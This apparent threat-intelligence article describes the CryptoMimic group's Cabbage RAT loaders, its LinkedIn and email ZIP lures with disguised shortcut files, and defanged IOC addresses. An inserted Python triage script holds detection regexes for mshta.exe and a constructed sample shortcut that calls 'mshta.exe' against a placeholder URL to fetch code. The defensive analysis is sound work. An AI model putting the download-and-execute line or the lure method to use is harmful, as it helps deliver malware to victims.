
The CryptoMimic Group targets global financial

Introduction

Recently, researchers disclosed that a threat group called CryptoMimic has targeted global financial institutions, including Japanese ones (especially cryptocurrency-related organizations). After analysis, they found similarities between CryptoMimic and Lazarus.

CryptoMimic uses Cabbage RAT in the early stages of the attack to reconnoitre the target and then execute msoRAT. As shown in the figure below, Cabbage RAT has a multi-stage load-and-execute structure: Cabbage RAT-A reads and executes Cabbage RAT-B, and Cabbage RAT-B reads and executes Cabbage RAT-C. The attack process is as follows.

[Figure: CryptoMimic's attack flow chart]

Cabbage RAT was first discovered in March 2018 and is written in VBScript. Since June 2020, however, a JScript version of Cabbage RAT has been observed instead of the VBScript version.

Most of CryptoMimic's attacks start with a malicious URL sent via email or LinkedIn. When the user visits the URL, a ZIP file is downloaded. The ZIP file contains a password-protected document file and a Windows shortcut file. The shortcut is named "password.txt.lnk", which prompts the user to open it in order to obtain the password for the document file.

[Figure: ZIP file contents]

Since the attack method using "password.txt.lnk" is now well known, the group has switched to shortcut files whose file names and icons mimic document files and Internet shortcuts.

[Figure: Examples of shortcut files used in recent attacks]

As in earlier versions, these shortcut files contain a command that uses mshta.exe to download and execute a file. The difference from the previous version is that the data downloaded by mshta.exe has changed from VBScript code to JScript code. When the JScript code is executed, explorer.exe accesses decoy text hosted on Google Drive and creates a decoy file on the infected device. In recent attacks the decoy text concerned cryptocurrency, indicating that CryptoMimic may still be targeting cryptocurrency-related organizations.

[Figure: Examples of decoy files]
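The lure structure described above (a ZIP carrying a "document" plus a shortcut that invokes mshta.exe against a remote URL) lends itself to a simple triage check. The following is an added example, not code from the original report or from the researchers; the ZIP it builds, the shortcut bytes and the URL lure.example.invalid are constructed placeholders, and the heuristics are assumptions based only on the behaviour this article describes.

```python
import io
import re
import zipfile

# A Windows shortcut starts with HeaderSize 0x4C followed by the ShellLink
# CLSID 00021401-0000-0000-C000-000000000046 in little-endian GUID layout.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
MSHTA = re.compile(rb"mshta(\.exe)?", re.IGNORECASE)
URL = re.compile(rb"https?://[^\s\"'\x00]+", re.IGNORECASE)
# "password.txt.lnk" and similar document-looking names from the article.
DOUBLE_EXT = re.compile(r"\.(txt|docx?|xlsx?|pdf|url)\.lnk$", re.IGNORECASE)

def lnk_indicators(data: bytes) -> dict:
    """Heuristic findings for one .lnk blob. Shortcut strings may be stored as
    UTF-16LE or ANSI, so both the raw bytes and a UTF-16LE decoding are matched."""
    utf16 = data.decode("utf-16le", errors="ignore").encode("ascii", errors="ignore")
    found = {"valid_header": data.startswith(LNK_MAGIC), "mshta": False, "urls": []}
    for view in (data, utf16):
        found["mshta"] |= MSHTA.search(view) is not None
        found["urls"] += [m.decode("ascii", "replace") for m in URL.findall(view)]
    found["urls"] = list(dict.fromkeys(found["urls"]))  # de-duplicate, keep order
    return found

def scan_zip(zip_bytes: bytes) -> list:
    """Flag shortcut members of a ZIP that match the lure pattern described above."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            ind = lnk_indicators(zf.read(info))
            reasons = []
            if DOUBLE_EXT.search(info.filename):
                reasons.append("double extension masquerading as a document")
            if ind["mshta"]:
                reasons.append("references mshta.exe")
            for url in ind["urls"]:
                reasons.append("embeds remote URL " + url)
            if reasons:
                findings.append({"member": info.filename, "reasons": reasons})
    return findings

def build_sample_zip(with_lnk: bool = True) -> bytes:
    """Constructed test input, not a real sample: a dummy 'protected' document and,
    optionally, a minimal shortcut whose UTF-16LE argument string calls mshta.exe."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Proposal.docx", b"placeholder, not a real document")
        if with_lnk:
            args = "mshta.exe http://lure.example.invalid/page.hta"  # placeholder URL
            zf.writestr("password.txt.lnk", LNK_MAGIC + b"\x00" * 20 + args.encode("utf-16le"))
    return buf.getvalue()
```

Run scan_zip(build_sample_zip()) to see the three reasons raised for the constructed shortcut; a ZIP without the shortcut yields an empty list.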

In Conclusion

The group remains active: researchers continue to observe attacks against Japanese organizations, and the malware continues to improve.

IOCs

103[.]31.249.62
45[.]61.139.215
84[.]201.189.216
103[.]130.195.170